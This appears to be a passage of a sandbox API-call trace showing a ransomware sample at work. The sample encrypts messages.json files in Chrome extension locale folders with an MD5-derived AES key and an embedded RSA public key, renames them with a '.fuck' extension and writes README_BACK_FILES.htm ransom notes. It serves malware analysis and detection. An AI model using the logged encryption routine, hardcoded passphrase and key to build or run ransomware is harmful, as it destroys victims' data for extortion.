[0248.284] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.286] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.286] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.286] CryptHashData (hHash=0x2938978, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.286] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.287] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.287] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.287] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293b7a8) returned 1 [0248.287] CryptImportPublicKeyInfo (in: hCryptProv=0x293b7a8, dwCertEncodingType=0x1, pInfo=0x292ed10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292ed40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292ed48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936bf8) returned 1 [0248.287] CryptEncrypt (in: hKey=0x2936bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.287] CryptEncrypt (in: hKey=0x2936bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293bad8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293bad8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.288] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293bad8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293bad8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.288] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd2, lpOverlapped=0x0) returned 1 [0248.289] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd2, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.289] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.289] CloseHandle (hObject=0x5d58) returned 1 [0248.289] CloseHandle (hObject=0x5d5c) returned 1 [0248.290] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), bFailIfExists=0) returned 1 [0248.295] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json", dwFileAttributes=0x0) returned 1 [0248.295] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.gsg")) returned 1 [0248.297] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.fuck")) returned 1 [0248.298] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.298] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.298] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.298] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.298] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.298] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\readme_back_files.htm")) returned 0xffffffff [0248.298] AreFileApisANSI () returned 1 [0248.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.298] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.299] GetFileType (hFile=0x5d50) returned 0x1 [0248.299] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.300] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.300] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.301] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.301] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.301] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.301] GetLastError () returned 0x0 [0248.301] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json")) returned 0x20 [0248.302] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json", dwFileAttributes=0x80) returned 1 [0248.302] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.303] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.304] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.304] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.306] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.306] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.307] CryptHashData (hHash=0x2938978, pbData=0x28cb698, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.307] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.307] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.307] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.307] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293bb60) returned 1 [0248.307] CryptImportPublicKeyInfo (in: hCryptProv=0x293bb60, dwCertEncodingType=0x1, pInfo=0x292f870*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f8a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f8a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937138) returned 1 [0248.307] CryptEncrypt (in: hKey=0x2937138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.307] CryptEncrypt (in: hKey=0x2937138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293b2e0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293b2e0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.307] WriteFile (in: hFile=0x5d58, lpBuffer=0x293b2e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293b2e0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.308] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdd, lpOverlapped=0x0) returned 1 [0248.309] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdd, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.310] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.310] CloseHandle (hObject=0x5d5c) returned 1 [0248.310] CloseHandle (hObject=0x5d58) returned 1 [0248.311] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), bFailIfExists=0) returned 1 [0248.314] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json", dwFileAttributes=0x0) returned 1 [0248.315] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.gsg")) returned 1 [0248.316] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.fuck")) returned 1 [0248.317] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.317] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.318] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.318] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.318] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.318] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\readme_back_files.htm")) returned 0xffffffff [0248.318] AreFileApisANSI () returned 1 [0248.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.318] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.320] GetFileType (hFile=0x5d50) returned 0x1 [0248.320] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.321] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.321] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.325] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.325] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.325] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.325] GetLastError () returned 0x0 [0248.325] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json")) returned 0x20 [0248.325] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json", dwFileAttributes=0x80) returned 1 [0248.326] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.327] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.328] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.328] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.331] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.331] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.331] CryptHashData (hHash=0x2938978, pbData=0x28cb698, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.331] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.331] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.331] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.331] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293b368) returned 1 [0248.331] CryptImportPublicKeyInfo (in: hCryptProv=0x293b368, dwCertEncodingType=0x1, pInfo=0x292fae0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292fb10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292fb18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937178) returned 1 [0248.332] CryptEncrypt (in: hKey=0x2937178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.332] CryptEncrypt (in: hKey=0x2937178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293b720*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293b720*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.332] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293b720*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293b720*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.333] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xcb, lpOverlapped=0x0) returned 1 [0248.334] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xcb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0248.334] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0248.335] CloseHandle (hObject=0x5d58) returned 1 [0248.335] CloseHandle (hObject=0x5d5c) returned 1 [0248.335] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 